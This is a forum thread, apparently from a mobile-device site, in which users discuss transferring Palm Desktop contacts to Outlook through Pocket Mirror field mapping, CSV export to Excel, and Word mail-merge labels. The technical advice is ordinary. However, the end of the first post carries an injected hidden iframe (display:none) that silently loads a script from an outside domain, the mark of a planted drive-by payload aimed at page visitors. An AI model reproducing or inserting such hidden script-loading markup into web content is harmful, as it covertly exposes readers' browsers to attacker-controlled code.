+ Reply to Thread

Palm Addy To Outlook

Ok, Ive tried a few things but all unseccesfully. I am now using Outlook and want to bring in all the contact info from my palm address book to outlook. The problem is the format of the palm. By that I mean palm lets you change the various telephone number fields around to display whatever you want. So for one contact the first phone number is an email address, the second could be a fax and the third a telephone number. Another contact may only have a phone number and that could be the first number. What this means is when you try to map out the fields it is contact specific. Does anyone know a workaround or way to do this? Even if I need to get software to convert the palm contacs then use that to convert to outlook it is worth it for me as I have a few. Thanks <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Pocket mirros feild mapping is global, and can't be per contact based unfortunatly.

Once you choose the default number in the palm addressbook screen it sticks though.

Funny you should mention it. I avoid Outlook like the plague, but I have a friend who want's to know if there's an easy way to transfer her Palm Desktop Addressbook into Outlook. Anybody know? She wants to make address labels from her Palm contacts. Anybody know how to do that?

I thought the Palm Desktop has an "export" facility for doing such a thing, or at least getting them into a comma seperated output file for use in Excel/word..from there you could make labels or export to outlook i'd imagine. -- I don't use the desktop myself, but I have heard about the export somewhere. maybe it was here? good luck.
    iPhone therefore iAm.

it does, but they'd still have to be in a consistent order.

Export your data to a CSV or tsb delimited file. Open it in Excel, strip out the feilds you don't need (columns). Save it.

Open MS Word, and select Tools-->Letters and mailings-->Mail merge wizard (at least in Office XP). I think you can do the same when selecting "New Office Document" from your Start Menu.

Once into the wizard, it walks you through picking your label stock number (ex. Avery 8010 Lables). You then place the "feilds" on a label and then let it merge it to a new document you can print onto your label sheets. It takes a little bit of playing with to get the feilds down, but once you have it figured out, it soooooo easy.

It looks fairly consistent to me.. maybe I should explain with more details how the exports would work.

Jazmaan's issue is easy:
    Just export & choose the right columns. The first 4 are for lastname, firstname,title & company, then next 5 fields let you choose a phone number and/or emails. and columns 10-13 are what compose the address, city, state, zip & Country --- unless the export messes up the order somehow...I would just grab fields 10-13 to make the address labels jazmaan needed.

To help boinker:
    once the data is in Excel create new columns with formulas to map the feilds individually to the corresponding palm columns (just use an IF and/or LOOKUP formula to find email fields "@")
    Then you'd have to import into outlook, I dont use outlook so not sure on how well & what order it wants but a little fiddling and research should figure that out.
    --its a lil messy but its a contact specific workaround that gets the job done & its cheap.... hopefully what boinker wanted.

Good luck.
    iPhone therefore iAm.

That won't cahnge how the contacts are shoved into the Palm. Pocket mirror allows you to pick which numbers are more important then the next, and that is a global feature. If he wants Jane Does mobile to be listed first, but Johns to be listed second, it can't be controled with Pocket Mirror.

Originally posted by HoTSynC
    That won't cahnge how the contacts are shoved into the Palm. Pocket mirror allows you to pick which numbers are more important then the next, and that is a global feature. If he wants Jane Does mobile to be listed first, but Johns to be listed second, it can't be controled with Pocket Mirror.
    While we are talking about field mapping... Does pocket mirror capture the Location field when syncing calendar items? I am currently using Truesync that came with my StarTac. I like it because it syncs with the Palm Desktop rather then as a conduit, so I don't need to be logged onto my corporate network when I sync the 7135 but I am having a couple of problems with it including the fact that it does not capture the location field. What I would like is to synch both the location field and the notes both into notes on the Palm.

Alan

Originally posted by alanb
    While we are talking about field mapping... Does pocket mirror capture the Location field when syncing calendar items? I am currently using Truesync that came with my StarTac. I like it because it syncs with the Palm Desktop rather then as a conduit, so I don't need to be logged onto my corporate network when I sync the 7135 but I am having a couple of problems with it including the fact that it does not capture the location field. What I would like is to synch both the location field and the notes both into notes on the Palm.

Alan
    You could map it to the custom feilds.